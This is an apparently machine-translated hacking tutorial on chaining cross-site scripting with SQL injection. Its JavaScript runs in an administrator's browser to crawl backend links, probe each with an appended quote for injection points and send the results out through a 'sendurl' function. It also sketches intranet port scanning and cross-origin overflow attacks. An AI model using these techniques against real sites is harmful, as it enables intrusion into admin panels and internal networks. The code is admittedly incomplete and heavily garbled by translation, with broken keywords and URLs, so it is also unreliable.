SQL-injection in XSS [six]

Significance of six:
1. permission restrictions are always reassuring, such as backend and Intranet ..... In addition, some programs officially deny the danger of background vulnerabilities. For example, * vbbs's attitude towards the previous data backup to get shell. Indeed, such a vulnerability is hard to be exploited directly due to permission restrictions. Like the above situation, XSS is often ignored by programmers, and it is not very easy to defend against. If two cases are combined, it means that the difficulty of using XSS will be greatly reduced...
2. Then, some people will say that XSS attacks can be exploited to hijack cookies and directly inherit permissions, such as directly logging on to the background. This is indeed a good method, but some background is now directly bound with IP. Therefore, we can use XSS to automatically launch a series of attacks on the background, such as SQL-injection.
3. For public programs, you can use htm/JS Code to automatically implement the background functions you want to attack, but what if it is completely black box?

Six principle:
1. Flowchart
Hack -----------> front-end ++> +
^ +
| +
Background <++
^
|
Administrator ------------
2. XMLHTTP allows your code to be quietly executed:
Codz: http://pstgroup.blogspot.com/2007/08/javascript.html of "simple XMLHTTP encapsulation" written by luoluo's brother

Six utilization:
1. Get the code of the background URL:

VaR XMLHTTP = new XMLHTTP ();
If (XMLHTTP. INIT ()){
XMLHTTP. Get ("http: // localhost: 808/index. php", function (s ){
// Log on to the foreground as an administrator and list all connections to search for the background, for example, obtain admin/index. php.
VaR Re = new Regexp ("<a href = \" ([^ \ "] *)", "ig ");
VaR M = NULL;
While (M = re.exe C (s ))! = NULL ){
Alert (M [1]);
Sendurl (M [1]); // in practice, you need to write a function to send and save the data. Note that XMLHTTP cannot be used for sending because XMLHTTP cannot be used for cross-origin.
}

});
}

2. Column the code of the background connection scan injection point:

VaR XMLHTTP = new XMLHTTP ();
If (XMLHTTP. INIT ()){
XMLHTTP. Get ("http: /localhost: 808/admin/index. php", function (s ){
VaR Re = new Regexp ("<a href = \" ([^ \ "] *)", "ig ");
VaR M = NULL;
While (M = re.exe C (s ))! = NULL ){
VaR XMLHTTP = new XMLHTTP ();
If (XMLHTTP. INIT ()){
XMLHTTP. Get (M [1] + "'", function (S1 ){
If (S1! = NULL ){
Alert (S1 );
Sendurl (S1 );
}
});}
// Alert (M [1]);
}

});
}
This is simply adding a 'test after the connection.

3. the attack code is missing.

The code above is very rough. If you want to complete it, you still need to do a lot of work.

Six Intranet:
Many Intranet web pages cannot be accessed on the Internet. If we want to access the six intranet, the first problem we need to solve is the cross-domain problem:
1. img iframe script can be used across domains.
2. XMLHTTP cannot be cross-origin, but can be used with some cross-origin vulnerabilities.

Steps:
(1) Port Scanning
Javascript based port connector: http://www.securiteam.com/exploits/5DP010KJFE.html
Flash Port: http://scan.flashsec.org/classes/Main.as
(2) scan the URL column and scan injection points and attacks
It is difficult to implement img iframe script using HTML, but the above XMLHTTP Code cannot be used for cross-origin directly, therefore, some cross-origin vulnerabilities must be used together. [is it a good way to find ActiveX cross-origin vulnerabilities?]
(3) overflow in XSS [oix]: (this is an external question): If we can cross-origin, we can use XMLHTTP to directly overflow Intranet servers such as FTP and HTTP, of course, the use of img iframe script can also overflow HTTP/FTP server URL overflow. Depends on the specific situation